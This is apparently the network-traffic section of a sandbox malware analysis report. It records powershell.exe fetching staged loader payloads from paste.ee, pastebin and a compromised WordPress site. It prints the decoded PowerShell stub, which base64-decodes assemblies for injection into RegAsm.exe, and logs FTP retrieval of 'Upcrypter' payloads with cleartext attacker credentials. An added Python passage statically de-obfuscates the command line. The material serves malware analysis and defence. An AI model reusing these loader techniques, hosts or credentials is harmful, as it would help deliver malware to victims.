Oct 3, 2024 09:30:15.645266056 CEST | 2404 | 49776 | 212.162.149.163 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 09:28:08.304816008 CEST | 57264 | 53 | 192.168.2.6 | 1.1.1.1
Oct 3, 2024 09:28:08.885384083 CEST | 53 | 57264 | 1.1.1.1 | 192.168.2.6
Oct 3, 2024 09:28:11.600537062 CEST | 54843 | 53 | 192.168.2.6 | 1.1.1.1
Oct 3, 2024 09:28:11.607836962 CEST | 53 | 54843 | 1.1.1.1 | 192.168.2.6
Oct 3, 2024 09:28:18.657073021 CEST | 57063 | 53 | 192.168.2.6 | 1.1.1.1
Oct 3, 2024 09:28:18.948904037 CEST | 53 | 57063 | 1.1.1.1 | 192.168.2.6
Oct 3, 2024 09:28:23.388641119 CEST | 63525 | 53 | 192.168.2.6 | 1.1.1.1
Oct 3, 2024 09:28:23.395855904 CEST | 53 | 63525 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 09:28:08.304816008 CEST | 192.168.2.6 | 1.1.1.1 | 0xd9df | Standard query (0) | ftp.desckvbrat.com.br | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:11.600537062 CEST | 192.168.2.6 | 1.1.1.1 | 0x6f63 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:18.657073021 CEST | 192.168.2.6 | 1.1.1.1 | 0x4bd9 | Standard query (0) | www.gratitudeseekers.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:23.388641119 CEST | 192.168.2.6 | 1.1.1.1 | 0xac6b | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 09:28:08.885384083 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9df | No error (0) | ftp.desckvbrat.com.br | desckvbrat.com.br |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 09:28:08.885384083 CEST | 1.1.1.1 | 192.168.2.6 | 0xd9df | No error (0) | desckvbrat.com.br |  | 191.252.83.213 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:11.607836962 CEST | 1.1.1.1 | 192.168.2.6 | 0x6f63 | No error (0) | paste.ee |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:11.607836962 CEST | 1.1.1.1 | 192.168.2.6 | 0x6f63 | No error (0) | paste.ee |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:18.948904037 CEST | 1.1.1.1 | 192.168.2.6 | 0x4bd9 | No error (0) | www.gratitudeseekers.com | gratitudeseekers.com |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 09:28:18.948904037 CEST | 1.1.1.1 | 192.168.2.6 | 0x4bd9 | No error (0) | gratitudeseekers.com |  | 173.231.247.100 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:23.395855904 CEST | 1.1.1.1 | 192.168.2.6 | 0xac6b | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:23.395855904 CEST | 1.1.1.1 | 192.168.2.6 | 0xac6b | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 09:28:23.395855904 CEST | 1.1.1.1 | 192.168.2.6 | 0xac6b | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
• paste.ee
• www.gratitudeseekers.com
• pastebin.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49713 | 188.114.97.3 | 443 | 6764 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:28:12 UTC | 67 | OUT | GET /d/RdlsG/0 HTTP/1.1
Host: paste.ee
Connection: Keep-Alive
2024-10-03 07:28:12 UTC | 1206 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 07:28:12 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky2YPiCzniAijJxYoOV0bmLKNjF%2FB6jCLkGyt6%2FXogq1tbtcys83x1z4x3kcZwf%2BWSLswsVKE4nO%2FXxXXMnYiRyTgYksY7Ln1tTp7yEhjx2RfyrMoxzk0GoeBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccb36cc2ef10f63-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49717 | 188.114.97.3 | 443 | 6764 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:28:18 UTC | 43 | OUT | GET /d/b5xuX/0 HTTP/1.1
Host: paste.ee
2024-10-03 07:28:18 UTC | 1204 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 07:28:18 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql8eKOp38A0KESyl7rHecI9lM0UGOmeAXIH33uit8JLDaNBigHF8ITrJTbgg7cFuqTmF8YHP0GLmz%2BHxK6DtlioJuxTckgUXq7dY85SGqpWGFG%2B1B1c%2B27uCJw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ccb36f16b8941ff-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49719 | 173.231.247.100 | 443 | 6764 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:28:19 UTC | 106 | OUT | GET /wp-includes/customize/css/bd.txt HTTP/1.1
Host: www.gratitudeseekers.com
Connection: Keep-Alive
2024-10-03 07:28:19 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 07:28:19 GMT
Server: Apache
Last-Modified: Tue, 01 Oct 2024 10:57:16 GMT
Accept-Ranges: bytes
Content-Length: 658776
Connection: close
Content-Type: text/plain
                                2024-10-03 07:28:19 UTC8000INData Raw: 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 41 41 45 4e 67 5a 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 55 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 41 41 52 44 63 42 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 30 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 41 51 55 41 5a 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 44 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 52 41 34 46 41 41 41 41 41 41 41 41 41 41 41 41 52 41 73 49 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 78 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 41 51 45 41 69 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44
                                Data Ascii: AAAw///v/AAAAA8///TNAAAAA////+DAAAAAAENgZAAAAA8///7PAAAAA////UDAAAAw///v/AAAAAAARDcBAAAAA////+DAAAAw///P0AAAAA8///7PAAAAAAQUAZDAAAAw///v/AAAAA8///DNAAAAA////+DARA4FAAAAAAAAAAAARAsIAAAAA////+DAAAAw///PxAAAAA8///7PAAAAAAQEAiDAAAAw///v/AAAAA8///TNAAAAA////+D
                                2024-10-03 07:28:19 UTC8000INData Raw: 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 43 52 46 52 46 55 5a 4a 31 51 4f 56 45 49 4f 6c 30 52 46 4a 55 4c 74 30 53 4c 74 41 41 41 41 30 53 4c 74 30 53 4c 5a 56 30 53 67 55 45 56 42 5a 56 53 53 42 46 49 45 35 55 52 74 30 53 4c 74 30 43 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 69 54 4a 64 55 52 43 31 53 4c 74 30 53 4c 41 41 41 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 53 51 54 4a 46 49 45 35 55 52 74 30 53 4c 74 30 43 41 74 30 53 4c 74 30 53 57 46 74 45 49 46 52 56 51 57 6c 6b 55 51 42 53 51 54 4a 46 49 4f 6c 30 52 46 4a 55 4c 74 30 53 4c 74 41 41 41 74 30 53 4c 74 30 43 54 53 4e 45 49 35 41 54 4e 59 42 43 52 4f 56 55 4c 74 30 53 4c 74 41 41 41 41 41 51 4c 74 30 53 4c 74 77 6b 55 44 42
                                Data Ascii: Lt0SWFtEIFRVQWlkUQBCRFRFUZJ1QOVEIOl0RFJULt0SLtAAAA0SLt0SLZV0SgUEVBZVSSBFIE5URt0SLt0CAt0SLt0SWFtEIFRVQWlkUQBiTJdURC1SLt0SLAAAAt0SLt0SWFtEIFRVQWlkUQBSQTJFIE5URt0SLt0CAt0SLt0SWFtEIFRVQWlkUQBSQTJFIOl0RFJULt0SLtAAAt0SLt0CTSNEI5ATNYBCROVULt0SLtAAAAAQLt0SLtwkUDB


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.6 | 49722 | 188.114.97.3 | 443 | 6764 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-03 07:28:21 UTC | 43 | OUT | GET /d/Ga0HE/0 HTTP/1.1
                                Host: paste.ee
                                2024-10-03 07:28:22 UTC | 1197 | IN | HTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:21 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 541
                                Connection: close
                                Cache-Control: max-age=2592000
                                strict-transport-security: max-age=63072000
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1; mode=block
                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTIK77JQmffUdPZ1eJnxcSrA0F2vI944viQPgxsbTd1rVHPGivmlvOzDvShKiavpJIULnvzYd2LSyoxQlSELA%2FtNI10hoqEs5bSm%2BK%2FcvQEiwE0MrKORLY4Q6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ccb37078e1b4384-EWR
                                2024-10-03 07:28:22 UTC172INData Raw: 24 64 71 73 78 42 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 52 65 67 41 73 6d 2e 65 78 65 27 3b 0a 0a 24 66 56 4c 46 55 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 6a 75 4e 6d 51 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c
                                Data Ascii: $dqsxB = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'RegAsm.exe';$fVLFU = ':';$juNmQ = 'A';$WYvtt = '%qlxKP%'.replace( $fVLFU, $juNmQ );[Byte[]] $l
                                2024-10-03 07:28:22 UTC369INData Raw: 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a 0a 24 6d 5a 69 6f 61 20 3d 20 27 25 6e 6b 47 4d 76 25 27 2e 72 65 70 6c 61 63 65 28 20 24 66 56 4c 46 55 2c 20 24 6a 75 4e 6d 51 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 61 6e 4b 6c 6f 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 6d 5a 69 6f 61 20 29 3b 0a 0a 24 61 7a 45 51 61 20 3d 20 22 43 6c 61 73 73 31 22 3b 0a 24 57 77 78 47 71 20 3d 20 22 52 75 6e 22 20 3b 0a 24 6e 6c 66 79 77 20 3d 20 22 43 6c 61 73 73 4c 69 62 72 61 72 79 31 2e 22 3b 0a 0a 5b 53 79 73 74 65 6d 2e 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e
                                Data Ascii: aWwJ = [System.Convert]::FromBase64String( $WYvtt );$mZioa = '%nkGMv%'.replace( $fVLFU, $juNmQ );[Byte[]] $anKlo = [System.Convert]::FromBase64String( $mZioa );$azEQa = "Class1";$WwxGq = "Run" ;$nlfyw = "ClassLibrary1.";[System.AppDomain]::Curren
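The stub that paste.ee returned above rebuilds a base64 blob by putting the letter A back in place of a marker: the raw bytes 27 e2 86 93 3a e2 86 93 27 at 07:28:22 show that $fVLFU is '↓:↓' (the Data Ascii rendering drops the arrows), and '%qlxKP%'.replace($fVLFU, $juNmQ) swaps it for 'A' before FromBase64String. The powershell.exe command line recorded for Target ID 2 further down applies the same idea at the syntax level: the base64 is cut into fragments and every A is re-inserted as [char]65, so no single fragment looks like base64 to a string scanner. The Python below is an added example, not code from the report or from the sample, and recovers both forms statically: it evaluates the fragment chain without running PowerShell, restores the marker, base64-decodes leniently (the report truncates the command line) and decodes the result as UTF-16LE, the encoding that the B-in-every-other-group pattern (OwB9ADsA...) gives away; because the decoded text reads backwards (ekovnI., llun$), the final step reverses it. SAMPLE_EXPR is the first seventy-odd fragments of the recorded command line, copied verbatim; SAMPLE_MARKED_BLOB is a constructed stand-in for the %qlxKP% placeholder, not data from the page.

```python
"""
Static de-obfuscation of the two loader stages recorded on this page.
Added example; not Joe Sandbox code and not part of the analysed sample.
"""
import base64
import re

# Excerpt (first seventy-odd fragments) of the powershell.exe command line
# recorded for Target ID 2 on this page, copied verbatim. The real line is
# much longer and is cut off in the report, so the decoder tolerates a
# truncated tail.
SAMPLE_EXPR = (
    "'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + "
    "'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + "
    "[char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + "
    "'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + "
    "[char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + "
    "'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + "
    "[char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + "
    "'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + "
    "[char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + "
    "[char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + "
    "[char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + "
    "[char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + "
    "[char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + "
    "[char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + "
    "'t' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + "
    "'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + "
    "'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + "
    "'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + "
    "'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + "
    "'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + "
    "[char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + "
    "'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + "
    "'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + "
    "'' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + "
    "[char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65"
)

# Constructed stand-in for the '%qlxKP%' placeholder of the paste.ee stub:
# base64 of an 8-byte MZ header with every 'A' swapped for the marker that
# the stub undoes with .replace($fVLFU, $juNmQ), i.e. '↓:↓' -> 'A'.
MARKER = "\u2193:\u2193"
SAMPLE_MARKED_BLOB = "TVqQ" + MARKER * 2 + "M" + MARKER * 4 + "="

# Single-quoted PowerShell literal ('' is an escaped quote) or [char]N.
TOKEN_RE = re.compile(r"'((?:[^']|'')*)'|\[char\](\d+)")


def concat_fragments(expr: str) -> str:
    """Evaluate a PowerShell 'lit' + [char]N + 'lit' chain without running it."""
    parts = []
    for m in TOKEN_RE.finditer(expr):
        if m.group(2) is not None:
            parts.append(chr(int(m.group(2))))
        else:
            parts.append(m.group(1).replace("''", "'"))
    return "".join(parts)


def restore_marker(blob: str, marker: str, letter: str = "A") -> str:
    """Undo the paste.ee stub's '%...%'.replace(marker, 'A') step."""
    return blob.replace(marker, letter)


def b64_to_bytes(b64: str) -> bytes:
    """Lenient base64: tolerate whitespace, a truncated tail and missing padding."""
    b64 = re.sub(r"\s+", "", b64)
    if len(b64) % 4 == 1:          # a lone trailing sextet can never form a byte
        b64 = b64[:-1]
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def decode_utf16le(raw: bytes) -> str:
    """PowerShell's -EncodedCommand flavour: UTF-16LE without a BOM."""
    if len(raw) % 2:               # truncated line: drop the half code unit
        raw = raw[:-1]
    return raw.decode("utf-16-le")


def deobfuscate_cmdline(expr: str) -> str:
    """Fragment chain -> base64 -> UTF-16LE -> reversed script text."""
    return decode_utf16le(b64_to_bytes(concat_fragments(expr)))[::-1]


if __name__ == "__main__":
    print(deobfuscate_cmdline(SAMPLE_EXPR))
    print(b64_to_bytes(restore_marker(SAMPLE_MARKED_BLOB, MARKER))[:2])
```

The excerpt decodes to the tail of the loader script, `null , [object[]] ( '...' , $huUPX , 'D DD' ) );};`, where the first argument is a URL that is itself stored reversed (it reads forward only before the final reversal). Decoding the remainder of the recorded line the same way yields the FTP fetch of Upcrypter/01/DLL01.txt with the desckvbrat1 credentials that appear in clear in the FTP log further down, which is how the two network records on this page connect.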


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.6 | 49724 | 104.20.4.235 | 443 | 3796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-03 07:28:23 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:24 UTC | 391 | IN | HTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:24 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: EXPIRED
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb3715ea2d42fe-EWR
                                2024-10-03 07:28:24 UTC | 11 | IN | Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.6 | 49728 | 104.20.4.235 | 443 | 2168 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-03 07:28:28 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:28 UTC | 395 | IN | HTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:28 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 4
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb3730e9384387-EWR
                                2024-10-03 07:28:28 UTC | 11 | IN | Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.6 | 49732 | 104.20.4.235 | 443 | 5412 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-03 07:28:35 UTC | 74 | OUT | GET /raw/pQQ0n3eA HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-10-03 07:28:35 UTC | 396 | IN | HTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:35 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 11
                                Last-Modified: Thu, 03 Oct 2024 07:28:24 GMT
                                Server: cloudflare
                                CF-RAY: 8ccb375f9ce90f84-EWR
                                2024-10-03 07:28:35 UTC | 11 | IN | Data Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                Data Ascii: 6false,
                                2024-10-03 07:28:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                Oct 3, 2024 09:28:09.531840086 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 220 "Servico de FTP da Locaweb"
                                Oct 3, 2024 09:28:09.532802105 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | USER desckvbrat1
                                Oct 3, 2024 09:28:09.761440039 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 331 Username ok, send password.
                                Oct 3, 2024 09:28:09.761626005 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | PASS developerpro21578Jp@@
                                Oct 3, 2024 09:28:09.999851942 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 230 Login successful.
                                Oct 3, 2024 09:28:10.227607965 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 501 Invalid argument.
                                Oct 3, 2024 09:28:10.227845907 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | PWD
                                Oct 3, 2024 09:28:10.455776930 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 257 "/" is the current directory.
                                Oct 3, 2024 09:28:10.455993891 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | TYPE I
                                Oct 3, 2024 09:28:10.683629036 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 200 Type set to: Binary.
                                Oct 3, 2024 09:28:10.683801889 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | PASV
                                Oct 3, 2024 09:28:10.912352085 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 227 Entering passive mode (191,252,83,213,236,159).
                                Oct 3, 2024 09:28:10.919930935 CEST | 49711 | 21 | 192.168.2.6 | 191.252.83.213 | RETR Upcrypter/01/DLL01.txt
                                Oct 3, 2024 09:28:11.149014950 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:11.545571089 CEST | 21 | 49711 | 191.252.83.213 | 192.168.2.6 | 226 Transfer complete.
                                Oct 3, 2024 09:28:15.422820091 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 220 "Servico de FTP da Locaweb"
                                Oct 3, 2024 09:28:15.423199892 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | USER desckvbrat1
                                Oct 3, 2024 09:28:15.645931959 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 331 Username ok, send password.
                                Oct 3, 2024 09:28:15.646159887 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | PASS developerpro21578Jp@@
                                Oct 3, 2024 09:28:15.877351046 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 230 Login successful.
                                Oct 3, 2024 09:28:16.100557089 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 501 Invalid argument.
                                Oct 3, 2024 09:28:16.101016998 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | PWD
                                Oct 3, 2024 09:28:16.517503023 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 257 "/" is the current directory.
                                Oct 3, 2024 09:28:16.518407106 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | TYPE I
                                Oct 3, 2024 09:28:16.740761995 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 200 Type set to: Binary.
                                Oct 3, 2024 09:28:16.741871119 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | PASV
                                Oct 3, 2024 09:28:16.966068983 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 227 Entering passive mode (191,252,83,213,235,101).
                                Oct 3, 2024 09:28:16.974225998 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | RETR Upcrypter/01/Rumpe.txt
                                Oct 3, 2024 09:28:17.197835922 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:17.583909035 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 226 Transfer complete.
                                Oct 3, 2024 09:28:20.258150101 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | PASV
                                Oct 3, 2024 09:28:20.480519056 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 227 Entering passive mode (191,252,83,213,236,93).
                                Oct 3, 2024 09:28:20.487405062 CEST | 49715 | 21 | 192.168.2.6 | 191.252.83.213 | RETR Upcrypter/01/Entry.txt
